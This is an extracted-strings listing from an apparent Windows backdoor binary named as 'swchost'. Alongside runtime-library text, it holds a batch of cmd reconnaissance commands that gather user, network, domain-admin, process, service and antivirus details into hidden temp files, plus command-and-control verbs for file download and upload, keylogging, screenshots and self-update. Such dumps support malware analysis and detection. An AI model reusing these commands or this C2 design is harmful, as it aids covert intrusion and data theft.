HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
(null)
`h````
xpxxxx
pScheduler
version
eventObject
ppVirtualProcessorRoots
UTF-16LE
UNICODE
_nextafter
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
 delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
 new[]
 delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
 Type Descriptor'
 Base Class Descriptor at (
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
`h`hhh
xppwpp
MessageBoxW
GetActiveWindow
GetLastActivePopup
GetUserObjectInformationW
GetProcessWindowStation
CreateFile2
SchedulerKind
MaxConcurrency
MinConcurrency
TargetOversubscriptionFactor
LocalContextCacheSize
ContextStackSize
ContextPriority
SchedulingProtocol
DynamicProgressFeedback
WinRTInitialization
MaxPolicyElementKey
Mbp?333333
pContext
pExecutionResource
CreateRemoteThreadEx
CreateUmsCompletionList
CreateUmsThreadContext
DeleteProcThreadAttributeList
DeleteUmsCompletionList
DeleteUmsThreadContext
DequeueUmsCompletionListItems
EnterUmsSchedulingMode
ExecuteUmsThread
GetCurrentUmsThread
GetNextUmsListItem
GetUmsCompletionListEvent
InitializeProcThreadAttributeList
QueryUmsThreadInformation
SetUmsThreadInformation
UmsThreadYield
UpdateProcThreadAttribute
RoInitialize
RoUninitialize
RegisterTraceGuidsW
UnregisterTraceGuids
TraceEvent
GetTraceLoggerHandle
GetTraceEnableLevel
GetTraceEnableFlags
pThreadProxy
1#SNAN
1#QNAN
?UUUUUU
?UUUUUU
?UUUUUU
?UUUUUU
switchState
Access violation - no RTTI data!
Bad dynamic_cast!
?8bunz8
?@En[vP
[*ncd>0
S>$hkDh$h>[2
UA>N0Wl
bad locale name
bad cast
ios_base::badbit set
ios_base::failbit set
generic
iostream
iostream stream error
unknown error
ios_base::eofbit set
invalid string position
string too long
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
A67D0DB8A2A173347654432503702AA3
A67D0DB8A2A173347654432503702222
A67D0DB885A3432576548A2A03707334
A67D0DB885A3432576548A2A03701111
20202020202020202020202020202020
A67D0DB885A343257654
20202020202020202020202020201111
A67D0DB885A3432576548A2A00001111
20202020202020202020202020202222
n.n.fc.
2020202020202020202020202020
                
2020:2020:2020:2020:2020:2020:2020:2222
|#|DownloadFile|#|Commandexecuted successfully
R:SF?commandId=CmdResult=
n.n.v.
00000000-0000-0000-0000-000000000000
Microsoft\windows\Tmp98871
cmd /a /c echo =========================== (User Name) ========================== > "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo %userdomain%\%username% >>"%localappdata%\Microsoft\Windows\jTmp765643.txt" 2>&1
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo ========================== (IP Config) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c ipconfig /all >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo ========================== (Net View) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c net view >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo ========================== (Net User) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c net user administrator /domain >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo ========================== (NetStat) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c netstat -ant >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo ========================== (SystemInfo) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c systeminfo >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo ========================== ( TaskList) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c tasklist >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo ========================== ( ServiceList) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c sc query >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo ========= (SecInfo) ================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /u /c type "%localappdata%\Microsoft\Windows\jTmp765643.txt" > "%localappdata%\Microsoft\Windows\tmp765643.txt"
del "%localappdata%\Microsoft\Windows\jTmp765643.txt"
del "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter  Path AntiVirusProduct 	Get   >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo --------------------------------------------------------------------------- 				     >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct 	Get   >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo --------------------------------------------------------------------------- 				     >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter  Path FirewallProduct 	Get  	/Format:List >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo --------------------------------------------------------------------------- 				     >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct 	Get     /Format:List >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo --------------------------------------------------------------------------- 				     >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter  Path AntiSpywareProduct  Get   	/Format:List >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo --------------------------------------------------------------------------- 				     >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiSpywareProduct  Get  	/Format:List >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo --------------------------------------------------------------------------- 				     >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
rem %localappdata%\Microsoft\Windows\Tmp765643.txt#1;
Microsoft\Windows\TmpFiles\
:\windows\temp\tmp887399
" & echo "Finished" >> "
ipconfig /all > "
"Finished"
DNS Servers
c:\windows\temp\tmp8873
%appdata%
Microsoft\Windows
%programdata%
echo %programdata% > "
Executed Successfully
R:GF?cId=
&message=
appId=
&type=
R:ReId?Id=
General
DownloadFile
UploadFile
R:SF?cId=
" & timeout /t 3 /nobreak & start "" "
\dd" "
move "
Replacement Done
Replace bad file
R:GAC?appId=
R:CR?cd=
ChangeAliveSeconds
ChangeAddress
\Microsoft\Windows\Tmp9932u1.bat
GetConfig
GetConfig:::
RunNewVersion
restart
remove
FastAlive
Not Done
ExecuteKL
GetVersion
PauseUpload
ResumeUpload
PauseDownload
ResumeDownload
ImmediateResetRam
&uniqueId=
R:AV?appId=
,why=ram,size=
" wait=10000)
Restart on high level ram usage, 
invalid unordered_map<K, T> key
vector<T> too long
invalid vector<T> subscript
list<T> too long
invalid stoi argument
stoi argument out of range
0123456789ABCDEF
Qkkbal
Qkkbal
system
8.8.8.8
1.0.197
need dictionary
invalid literal/length code
invalid distance code
invalid block type
invalid stored block lengths
too many length or distance symbols
invalid bit length repeat
oversubscribed dynamic bit lengths tree
incomplete dynamic bit lengths tree
oversubscribed literal/length tree
incomplete literal/length tree
oversubscribed distance tree
incomplete distance tree
empty distance tree with lengths
unknown compression method
invalid window size
incorrect header check
incorrect data check
 2>&1)  > "
(taskkill /f /pid "
ct_init: length != 256
ct_init: dist != 256
ct_init: 256+dist != 512
bit length overflow
code %d bits %d->%d
inconsistent bit counts
gen_codes: max_code %d 
dyn trees: dyn %ld, stat %ld
not enough codes
too many codes
bl counts: 
bl code %2d 
bl tree: sent %ld
lit tree: sent %ld
dist tree: sent %ld
lit data: dyn %ld, stat %ld
dist data: dyn %ld, stat %ld
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u 
bad compressed size
ct_tally: bad match
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%) 
bad d_code
invalid length
output buffer too small for in-memory compression
bad pack level
insufficient lookahead
no future
wild scan
more < 2
C:\Users\Void\Desktop\wmiPrv\v 10.0.197\x64\Release\swchost.pdb
WideCharToMultiByte
RaiseException
GetLastError
InitializeCriticalSectionAndSpinCount
DeleteCriticalSection
CloseHandle
DecodePointer
CreateThread
SetEvent
WaitForSingleObject
HeapAlloc
HeapFree
HeapReAlloc
HeapSize
GetProcessHeap
CreateTimerQueue
CreateEventW
CreateTimerQueueTimer
DeleteTimerQueueTimer
DeleteTimerQueue
GetCurrentProcessId
CreateToolhelp32Snapshot
Process32NextW
SetConsoleCtrlHandler
SetErrorMode
SetUnhandledExceptionFilter
CreateFileA
SetFilePointer
ReadFile
SystemTimeToFileTime
GetCurrentDirectoryW
MultiByteToWideChar
LocalFileTimeToFileTime
GetFileAttributesW
CreateDirectoryW
CreateFileW
WriteFile
SetFileTime
DeleteFileW
FindFirstFileW
GetModuleFileNameW
CreateProcessW
GetConsoleWindow
FindNextFileW
FindClose
OpenProcess
TerminateProcess
GetFileAttributesA
GetWindowsDirectoryW
GetCurrentProcess
GetSystemInfo
FileTimeToSystemTime
GetFileInformationByHandle
GetFileSize
UnmapViewOfFile
GetLocalTime
GetTickCount
KERNEL32.dll
GetMessageW
DispatchMessageW
TranslateMessage
GetSystemMetrics
LoadAcceleratorsW
TranslateAcceleratorW
wsprintfW
ReleaseDC
GetDesktopWindow
USER32.dll
CreateCompatibleBitmap
CreateCompatibleDC
SelectObject
BitBlt
DeleteObject
GDI32.dll
SHGetSpecialFolderPathW
SHGetFolderPathW
SHELL32.dll
StringFromGUID2
CoCreateGuid
ole32.dll
GdipGetImageEncodersSize
GdipGetImageEncoders
GdiplusStartup
GdipCreateBitmapFromHBITMAP
GdipFree
GdipAlloc
GdipCloneImage
GdipDisposeImage
GdipSaveImageToFile
GdiplusShutdown
gdiplus.dll
WS2_32.dll
QueryWorkingSet
GetProcessMemoryInfo
PSAPI.DLL
GetCurrentThreadId
GetStringTypeW
EncodePointer
EnterCriticalSection
LeaveCriticalSection
GetSystemTimeAsFileTime
IsDebuggerPresent
IsProcessorFeaturePresent
ExitProcess
GetModuleHandleExW
GetProcAddress
AreFileApisANSI
GetCPInfo
GetCommandLineA
RtlPcToFileHeader
RtlLookupFunctionEntry
RtlUnwindEx
WaitForSingleObjectEx
SignalObjectAndWait
SwitchToThread
SetThreadPriority
GetThreadPriority
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetLogicalProcessorInformation
ChangeTimerQueueTimer
GetModuleHandleW
GetNumaHighestNodeNumber
GetProcessAffinityMask
SetThreadAffinityMask
RegisterWaitForSingleObject
UnregisterWait
RtlCaptureContext
RtlVirtualUnwind
UnhandledExceptionFilter
SetLastError
GetStartupInfoW
CreateSemaphoreW
GetDateFormatW
GetTimeFormatW
CompareStringW
LCMapStringW
GetLocaleInfoW
IsValidLocale
GetUserDefaultLCID
EnumSystemLocalesW
GetConsoleCP
GetConsoleMode
IsValidCodePage
GetACP
GetOEMCP
GetCurrentThread
GetStdHandle
FreeLibrary
LoadLibraryExW
MoveFileExW
GetFileType
SetFilePointerEx
FlushFileBuffers
GetModuleFileNameA
QueryPerformanceCounter
GetEnvironmentStringsW
FreeEnvironmentStringsW
OutputDebugStringW
GetThreadTimes
FreeLibraryAndExitThread
GetModuleHandleA
GetVersionExW
VirtualAlloc
VirtualFree
VirtualProtect
DuplicateHandle
ReleaseSemaphore
InitializeSListHead
InterlockedPopEntrySList
InterlockedPushEntrySList
InterlockedFlushSList
QueryDepthSList
UnregisterWaitEx
GetTimeZoneInformation
SetStdHandle
WriteConsoleW
ReadConsoleW
LoadLibraryW
SetEndOfFile
SetEnvironmentVariableA
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_alloc@std@@
.?AVlength_error@std@@
.?AV_Locimp@locale@std@@
.?AV?$num_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV?$numpunct@D@std@@
.?AV?$codecvt@GDH@std@@
.?AV?$ctype@G@std@@
.?AV?$num_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$num_get@GV?$istreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AV?$numpunct@_W@std@@
.?AUmessages_base@std@@
.?AUmoney_base@std@@
.?AUtime_base@std@@
.?AV?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$collate@_W@std@@
.?AV?$messages@_W@std@@
.?AV?$money_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$money_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$moneypunct@_W$0A@@std@@
.?AV?$_Mpunct@_W@std@@
.?AV?$moneypunct@_W$00@std@@
.?AV?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$num_put@GV?$ostreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AV?$numpunct@G@std@@
.?AV?$collate@G@std@@
.?AV?$messages@G@std@@
.?AV?$money_get@GV?$istreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AV?$money_put@GV?$ostreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AV?$moneypunct@G$0A@@std@@
.?AV?$_Mpunct@G@std@@
.?AV?$moneypunct@G$00@std@@
.?AV?$time_get@GV?$istreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AV?$time_put@GV?$ostreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AV?$collate@D@std@@
.?AV?$messages@D@std@@
.?AV?$money_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV?$money_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV?$moneypunct@D$0A@@std@@
.?AV?$_Mpunct@D@std@@
.?AV?$moneypunct@D$00@std@@
.?AV?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AVtype_info@@
.?AVbad_typeid@std@@
.?AV__non_rtti_object@std@@
.?AVbad_exception@std@@
.?AVimproper_lock@Concurrency@@
.?AVWaitBlock@details@Concurrency@@
.?AVSingleWaitBlock@details@Concurrency@@
.?AVMultiWaitBlock@details@Concurrency@@
.?AVWaitAllBlock@details@Concurrency@@
.?AVWaitAnyBlock@details@Concurrency@@
.?AV?$_MallocaArrayHolder@PEAVContext@Concurrency@@@details@Concurrency@@
.?AVscheduler_resource_allocation_error@Concurrency@@
.?AVinvalid_operation@Concurrency@@
.?AV_Interruption_exception@details@Concurrency@@
.?AVscheduler_worker_creation_error@Concurrency@@
.?AVunsupported_os@Concurrency@@
.?AVimproper_scheduler_attach@Concurrency@@
.?AVimproper_scheduler_reference@Concurrency@@
.?AVcontext_unblock_unbalanced@Concurrency@@
.?AVcontext_self_unblock@Concurrency@@
.?AVmissing_wait@Concurrency@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_scheduler_policy_value@Concurrency@@
.?AVinvalid_scheduler_policy_thread_specification@Concurrency@@
.?AVnested_scheduler_missing_detach@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AVResourceManager@details@Concurrency@@
.?AUIResourceManager@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AUITopologyNode@Concurrency@@
.?AUTopologyObject@GlobalCore@details@Concurrency@@
.?AUTopologyObject@GlobalNode@details@Concurrency@@
.?AVScheduleGroupBase@details@Concurrency@@
.?AVScheduleGroup@Concurrency@@
.?AVCacheLocalScheduleGroup@details@Concurrency@@
.?AVFairScheduleGroup@details@Concurrency@@
.?AVSchedulerBase@details@Concurrency@@
.?AVScheduler@Concurrency@@
.?AU_Chore@details@Concurrency@@
.?AVRealizedChore@details@Concurrency@@
.?AVCacheLocalScheduleGroupSegment@details@Concurrency@@
.?AVScheduleGroupSegmentBase@details@Concurrency@@
.?AVFairScheduleGroupSegment@details@Concurrency@@
.?AVContextBase@details@Concurrency@@
.?AVContext@Concurrency@@
.?AV_RefCounter@details@Concurrency@@
.?AV_CancellationTokenRegistration@details@Concurrency@@
.?AVCancellationTokenRegistration_TaskProc@details@Concurrency@@
.?AV?$_MallocaArrayHolder@PEAVevent@Concurrency@@@details@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
.?AVSchedulerProxy@details@Concurrency@@
.?AUISchedulerProxy@Concurrency@@
.?AVFreeThreadProxy@details@Concurrency@@
.?AVThreadProxy@details@Concurrency@@
.?AUIThreadProxy@Concurrency@@
.?AUIThreadProxyFactory@details@Concurrency@@
.?AVFreeThreadProxyFactory@details@Concurrency@@
.?AV?$ThreadProxyFactory@VFreeThreadProxy@details@Concurrency@@@details@Concurrency@@
.?AVVirtualProcessor@details@Concurrency@@
.?AVInternalContextBase@details@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AVExternalContextBase@details@Concurrency@@
.?AVThreadScheduler@details@Concurrency@@
.?AUIScheduler@Concurrency@@
.?AVThreadInternalContext@details@Concurrency@@
.P6AXPEAV__ExceptionPtr@@@Z
.?AV_Ref_count_base@std@@
.?AV?$_Ref_count@V__ExceptionPtr@@@std@@
.?AV?$_Ref_count_del_alloc@V__ExceptionPtr@@P6AXPEAV1@@ZV?$_DebugMallocator@H@@@std@@
.?AVVirtualProcessorRoot@details@Concurrency@@
.?AUIVirtualProcessorRoot@Concurrency@@
.?AVFreeVirtualProcessorRoot@details@Concurrency@@
.?AVThreadVirtualProcessor@details@Concurrency@@
.?AV?$ctype@D@std@@
.?AUctype_base@std@@
.?AVfacet@locale@std@@
.?AVbad_cast@std@@
.?AV_Facet_base@std@@
.?AV_Iostream_error_category@std@@
.?AV_Generic_error_category@std@@
.?AVerror_category@std@@
.?AVfailure@ios_base@std@@
.?AVsystem_error@std@@
.?AV_System_error@std@@
.?AVruntime_error@std@@
.?AVexception@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ifstream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ofstream@DU?$char_traits@D@std@@@std@@
.?AV?$codecvt@DDH@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AVcodecvt_base@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AVout_of_range@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AVios_base@std@@
.?AV?$_Iosb@H@std@@
.?AVinvalid_argument@std@@
.?AV_System_error_category@std@@
.?AV?$codecvt_utf8_utf16@_W$0BAPPPP@$0A@@std@@
.?AV?$codecvt_utf8@_W$0BAPPPP@$0A@@std@@
.?AV?$basic_ofstream@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_ifstream@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_filebuf@_WU?$char_traits@_W@std@@@std@@
.?AV?$ctype@_W@std@@
.?AV?$basic_istream@_WU?$char_traits@_W@std@@@std@@
.?AV?$codecvt@_WDH@std@@
.?AV?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_ostream@_WU?$char_traits@_W@std@@@std@@
.?AVBitmap@Gdiplus@@
.?AVImage@Gdiplus@@
.?AVGdiplusBase@Gdiplus@@
.?AVlogic_error@std@@
.?AV?$basic_ios@_WU?$char_traits@_W@std@@@std@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>